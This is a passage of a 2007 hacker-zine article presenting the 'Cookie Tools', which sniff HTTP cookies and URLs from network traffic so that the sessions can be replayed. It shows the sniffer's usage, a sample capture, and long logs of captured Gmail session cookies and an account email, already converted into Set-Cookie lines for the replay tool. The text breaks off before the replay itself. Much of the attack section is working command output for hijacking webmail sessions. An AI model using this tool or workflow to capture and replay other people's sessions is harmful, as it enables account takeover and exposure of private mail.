BFi14-dev-07 - i C00KiE T00LS

xenion - Michele Dallachiesa

michele dot dallachiesa at poste dot it


Abstract:

This is the (unofficial) HTML version of the article BFi14-dev-07. For anything else, see §6. The version of the Cookie Tools considered here is 0.3.

Introduction

In recent years interest in web applications has kept growing. Google is making them its key point with its countless services, followed closely by everyone else. Behind it lies personalized advertising, a business worth lots and lots and lots of money. Many "free" services are above all a system for collecting information about each of us. The more private the information, the better it characterizes us. So our email correspondence and our personal documents are also our most significant representation. Google knows this, and that is also why services like Google Mail and Google Docs exist. All these applications are accessible via the web. Security? Well, here there are problems. By default these services are not secure at all: everything is carried by HTTP in the clear. This is surely a choice, not an oversight. I will refer mostly to Google because I am a (happy) Google user and so it interests me most; what follows, however, also applies to the services of Microsoft, Yahoo and many others.

In this article I present the Cookie Tools, a set of applications with which you can do various things: sniff and record the session information present in HTTP headers (cookies, URLs, ...), analyze the collected information and carry out the (cookie|URL) replay attack in a few seconds. As far as I know, this is the most advanced project with these features (released under the GPL version 2). Finally, with the Cookie Tools we will analyze Gmail's cookies and use them to carry out the cookie replay attack.

cookiesniffer

cookiesniffer is a simple and powerful cookie sniffer that recognizes (through heuristics) and reconstructs (with libnids) any HTTP connection, new or already existing, parsing any valid or partially valid HTTP message. The output is a set of files containing the collected information with time-stamps, in a format that can easily be used with the standard UNIX tools such as grep, awk, cut and sed. It supports wireless networks (AP_DLT_IEEE802_11).

Usage

The only mandatory parameter is the packet source (network interface or pcap file). This is the list of accepted parameters; it should be fairly self-explanatory:

xenion@gollum:~/dev/cookietools$ ./bin/cookiesniffer                
Copyright (c) 2007 Dallachiesa Michele <micheleDOTdallachiesaATposteDOTit>
cookiesniffer of the Cookie Tools v0.3. The Cookie Tools are free software,
covered by the GNU General Public License version 2.

USAGE: cookiesniffer (-r|-i) <source> [options]

 INPUT

  -r <str>      Read packets from file (pcap format) <str>
  -i <str>      Read packets from network interface <str>
  -L <int>      Force datalink header length == <int>

 OUTPUT

  -d <str>      Set output directory to <str> (def: '.')
  -s            Save packets to 'x/pkts.y.pcap'
  -f            Disable stdout logging
  -F            Enable syslog logging
  -v            Be verbose

 SELECT

  -m            Sniff in promiscuous mode
  -p <str>      Add pcap filter <str>

 EXECUTION

  -Z <str>      Run as user <str>
  -D            Run in background (option -f implicit)

 MISC

  -0            Disable single packet handling (may cause information loss)
  -h            This

xenion@gollum:~/dev/cookietools$

This is an example run (take packets from the network interface eth0 using 'logz' as the output directory, while I am visiting mail.google.com and bbc.com from the browser):

xenion@gollum:~/dev/cookietools$ mkdir logz
xenion@gollum:~/dev/cookietools$ sudo ./bin/cookiesniffer -i eth0 -d logz
 + cookiesniffer of The Cookie Tools v0.3 running here!
 + pid: 15867, date/time: 21/11/2007#11:31:39
 + Configuration
   + INPUT
     Packet source: iface 'eth0'
     Force datalink header length: disabled
   + OUTPUT
     Output directory: 'logz'
     Logfile: 'logz/0.txt'
     Save pcap: disabled
     stdout logging: enabled
     Syslog logging: disabled
     Be verbose: disabled
   + SELECT
     Sniff in promiscuous mode: disabled
     Add pcap filter: disabled
   + EXECUTION
     Running as user/group: root/root
     Running daemonized: disabled
     Single packet handling: enabled
 * You can dump stats sending me a SIGUSR2 signal
 * Reading packets...
 ! handling single HTTP pkt: 192.168.1.2:47260 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47260
 ! handling single HTTP pkt: 192.168.1.2:47255 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47255
 ! handling single HTTP pkt: 192.168.1.2:47260 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47260
 ! handling single HTTP pkt: 192.168.1.2:47255 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47255
 ! handling single HTTP pkt: 192.168.1.2:47260 > 72.14.221.19:80
 ! handling single HTTP pkt: 72.14.221.19:80 > 192.168.1.2:47260
 ! observing HTTP conn: 192.168.1.2:44048 > 212.58.224.125:80
 ! observing HTTP conn: 192.168.1.2:57767 > 212.58.253.72:80
 ! observing HTTP conn: 192.168.1.2:40400 > 62.189.244.254:80
 ! observing HTTP conn: 192.168.1.2:43955 > 209.62.178.57:80
 ! observing HTTP conn: 192.168.1.2:43956 > 209.62.178.57:80
 ! observing HTTP conn: 192.168.1.2:43957 > 209.62.178.57:80
 ! observing HTTP conn: 192.168.1.2:43958 > 209.62.178.57:80
 ! observing HTTP conn: 192.168.1.2:55713 > 209.62.176.52:80

You can also get some statistics by sending the process the SIGUSR2 signal. This is the resulting output directory:

xenion@gollum:~/dev/cookietools$ ls logz
192.168.1.2-209.62.176.52.session   192.168.1.2-212.58.253.72.txt
192.168.1.2-209.62.176.52.txt       192.168.1.2-62.189.244.254.session
192.168.1.2-209.62.178.57.session   192.168.1.2-62.189.244.254.txt
192.168.1.2-209.62.178.57.txt       192.168.1.2-72.14.221.19.session
192.168.1.2-212.58.224.125.session  192.168.1.2-72.14.221.19.txt
192.168.1.2-212.58.224.125.txt      log.0.txt
192.168.1.2-212.58.253.72.session
xenion@gollum:~/dev/cookietools$

This is run 0 (the first run), and the file log.0.txt contains the log of the run. Each tracked connection has 2 files: the file clientip-serverip.txt contains information that you can easily read, the file clientip-serverip.session contains information that cookieserver can easily use. Note that in the session file the HTTP "Cookie" headers are magically transformed into "Set-Cookie", using "/" as path, "Tuesday, 2-Feb-2020 02:02:02 GMT" as expires and, as domain, the top domain extracted from the HTTP "Host" header or from the requested URL. This maximizes the power of cookieserver. The session file also contains the requested URLs (they can contain relevant session information). These are the logs of the connections from 192.168.1.2 (client) to 66.249.91.19 (server):

xenion@gollum:~/dev/cookietools$ cat logz/192.168.1.2-72.14.221.19.txt
pktcount=4 time=21/11/2007#11:31:41.239263 src=192.168.1.2:47260 dst=72.14.221.19:80
s POST /mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=9&SID=B7BBE82A5077EC37&RID=89041&zx=it9k92y1rgwv&t=1 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Content-Type: application/x-www-form-urlencoded
h Referer: http://mail.google.com/mail/
h Content-Length: 35
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'

pktcount=13 time=21/11/2007#11:31:41.555086 src=192.168.1.2:47260 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Encoding: gzip
h Content-Length: 26
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:42 GMT

pktcount=17 time=21/11/2007#11:31:42.446297 src=192.168.1.2:47255 dst=72.14.221.19:80
s GET /mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'
c0 name='SID' value='DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF'

pktcount=21 time=21/11/2007#11:31:42.699130 src=192.168.1.2:47255 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache, no-store
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h Content-Encoding: gzip
h Content-Length: 919
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:43 GMT

pktcount=23 time=21/11/2007#11:31:42.972861 src=192.168.1.2:47260 dst=72.14.221.19:80
s GET /mail/?ui=2&ik=a70d6eca1f&view=ad&ak=s6cmkdkein1jmp2a91ddp8yun54n24w HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'
c0 name='SID' value='DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF'

pktcount=27 time=21/11/2007#11:31:43.196161 src=192.168.1.2:47260 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache, no-store
h Pragma: no-cache
h Content-Type: text/javascript; charset=UTF-8
h Content-Encoding: gzip
h Content-Length: 764
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:43 GMT

pktcount=29 time=21/11/2007#11:31:46.113463 src=192.168.1.2:47255 dst=72.14.221.19:80
s POST /mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=1552&SID=B7BBE82A5077EC37&RID=89042&zx=d7qazjopodh6&t=1 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Content-Type: application/x-www-form-urlencoded
h Referer: http://mail.google.com/mail/
h Content-Length: 35
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GMAIL_STAT_PENDING' value='/S:a=lc&sv=tl&ev=tl&s=25&t=1637&w=623&'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'

pktcount=35 time=21/11/2007#11:31:46.626738 src=192.168.1.2:47255 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Encoding: gzip
h Content-Length: 26
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:47 GMT

pktcount=38 time=21/11/2007#11:31:50.984025 src=192.168.1.2:47260 dst=72.14.221.19:80
s GET /mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=6425&SID=B7BBE82A5077EC37&RID=89043&TYPE=terminate&zx=eh281lp7e4it HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Referer: http://mail.google.com/mail/
c0 type=Cookie
c0 name='__utma' value='173272373.1523618165.1195636735.1195636735.1195636735.1'
c0 name='__utmc' value='173272373'
c0 name='__utmz' value='173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral'
c0 name='GMAIL_STAT_PENDING' value='/S:a=lc&sv=tl&ev=tl&s=25&t=1637&w=623&'
c0 name='GX' value='DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v'
c0 name='S' value='gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y'
c0 name='GMAIL_AT' value='xn3j37i0ev7wcknl8mwn6svd7dl85s'
c0 name='gmailchat' value='charlieroot69@gmail.com/138671'
c0 name='TZ' value='-60'
c0 name='GMAIL_RTT' value='121'
c0 name='GMAIL_LOGIN' value='T1195636734978/1195636734978/1195636738633'
c0 name='SID' value='DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF'

pktcount=44 time=21/11/2007#11:31:51.203587 src=192.168.1.2:47260 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Length: 0
h Server: GFE/1.3
h Date: Wed, 21 Nov 2007 10:31:51 GMT

xenion@gollum:~/dev/cookietools$ cat logz/192.168.1.2-72.14.221.19.session 
1195641101.239263 Link: http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=9&SID=B7BBE82A5077EC37&RID=89041&zx=it9k92y1rgwv&t=1
1195641101.239263 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641101.239263 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Link: http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
1195641102.446297 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.446297 Set-Cookie: SID=DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Link: http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=s6cmkdkein1jmp2a91ddp8yun54n24w
1195641102.972861 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641102.972861 Set-Cookie: SID=DQAAAGwAAACE2b7aSYrQhQLPo-6CPWyHxwgtAQHWvHMkNNlhgioxnGVZ94fyOyP0DHOY9vDqO9uOQSgvNO3B3g4beCKYNbek6PctrTdrUjNKfGuFk_Z_kdFYB72TlLsL8HututH5PNMSHkFXIC8A0510ugE1g0qF; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Link: http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=1552&SID=B7BBE82A5077EC37&RID=89042&zx=d7qazjopodh6&t=1
1195641106.113463 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=25&t=1637&w=623&; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GX=DQAAAG8AAACjafoPn5mnL_8MJW1nVv5YXx3DKtO9FNCcs9XOGqKcKQ3sUbDCPajbczMVOxCS39raD7wjL5G000VJRQ-BvBJtwX-t1mWdXCyGp9LOWfrnjGeSx5OpA2o2JFJDSRF_puHr_a7stqXQjUqdZGBJkB9v; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: S=gmail=L0lNcfSZrxf9zS0_bnoG1g:gmail_yj=j8AXLSaEdnrRWXL9Mck0Yw:gmproxy=aULplbxy37k:gmproxy_yj=Ozc4CqRZ6RY:gmproxy_yj_sub=eGfjrGPBT6Y; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GMAIL_AT=xn3j37i0ev7wcknl8mwn6svd7dl85s; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: gmailchat=charlieroot69@gmail.com/138671; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: TZ=-60; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GMAIL_RTT=121; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641106.113463 Set-Cookie: GMAIL_LOGIN=T1195636734978/1195636734978/1195636738633; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Link: http://mail.google.com/mail/channel/bind?at=xn3j37i0ev7wcknl8mwn6svd7dl85s&VER=5&it=6425&SID=B7BBE82A5077EC37&RID=89043&TYPE=terminate&zx=eh281lp7e4it
1195641110.984025 Set-Cookie: __utma=173272373.1523618165.1195636735.1195636735.1195636735.1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: __utmz=173272373.1195636735.1.1.utmccn=(referral)|utmcsr=mail.google.com|utmcct=/mail/|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1195641110.984025 Set-Cookie: GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=25&t=1637&w=623&; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
